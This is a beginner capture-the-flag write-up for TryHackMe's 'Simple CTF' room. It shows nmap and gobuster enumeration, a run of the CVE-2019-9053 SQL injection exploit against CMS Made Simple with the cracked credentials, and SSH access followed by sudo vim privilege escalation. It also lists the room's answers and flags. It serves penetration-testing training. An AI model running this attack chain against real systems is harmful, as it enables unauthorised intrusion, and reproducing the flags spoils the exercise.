TryHackMe — Simple CTF
Beginner level ctf
Description
The Simple CTF is an entry-level CTF that demonstrates most of the skills required for all CTFs, including enumeration, research, exploitation and privilege escalation.
Recon
First step use NMAP to find out what is running on the box:
nmap -sV -sS -sC -n [IP]
1.How many services are running under port 1000?
ANSWER: 2
2.What is running on the higher port?
ANSWER: ssh
Next, we can use “gobuster” to scan the website for any additional pages.
gobuster dir -u http://[IP] -w /usr/share/wordlists/dirb/common.txt -t 50
http://[IP]/simple does however give us something useful, its a CMS system
At the bottom of this site I am given the version number. It seems that this CMS is running on version 2.2.8
And a search on ExploitDB tells us that this version has a SQL Injection exploit available, and that there is a exploit available.
More info can be found here: CMS Made Simple < 2.2.10 - SQL Injection
or use searchsploit
searchsploit CMS Made Simple 2.2.8
- What’s the CVE you’re using against the application?
CVE-2019-9053
- To what kind of vulnerability is the application vulnerable?
sqli
Run the exploit:
python2 46635.py -u http://[IP]/simple/ --crack -w 10k-most-common.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
5.What’s the password?
secret
Gain Access
- Where can you login with the details obtained?
ssh
- What’s the user flag?
G00d j0b, keep up!
- Is there any other user in the home directory? What’s its name?
sunbath
Privilege escalation
Now to get the root flag, lets first check what is this allowed run as sudo using “sudo -l”
vim can be run as sudo and without password. Now use your favorite resource like gtfobin: https://gtfobins.github.io/gtfobins/vim/
- What can you leverage to spawn a privileged shell?
vim
- What’s the root flag?
W3ll d0n3. You made it!
Thank you for reading
Room Link: